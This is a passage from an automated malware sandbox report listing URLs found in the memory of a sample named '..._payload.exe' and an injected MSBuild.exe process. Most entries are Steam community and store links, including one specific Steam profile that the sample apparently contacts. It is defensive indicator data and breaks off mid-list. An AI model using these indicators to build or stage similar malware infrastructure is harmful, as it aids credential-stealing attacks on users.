00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259%
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003202000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259O
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003202000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/z
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowere
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 